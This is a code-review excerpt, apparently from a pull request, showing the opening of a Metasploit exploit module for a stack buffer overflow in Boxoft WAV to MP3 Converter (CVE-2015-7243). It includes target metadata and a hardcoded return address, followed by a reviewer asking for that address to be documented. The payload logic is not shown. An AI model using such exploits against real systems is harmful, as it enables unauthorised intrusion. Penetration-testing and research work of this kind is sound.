modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb

```diff
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
+       By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the application,
+       a buffer is overwritten, which allows for running shellcode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Robbie Corley', # EDB POC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7243' ],
+          [ 'EDB', '38035' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Boxoft WAV to MP3 Converter v1.1',
+            {
+              'Ret' => 0x0040144c
```

Comment:
Please document what this return address is. I assume it's a `pop`/`pop`/`ret` sequence for SEH, but it's helpful to document where you got it from.

Reply:
(Such as a packaged DLL or the system, etc.)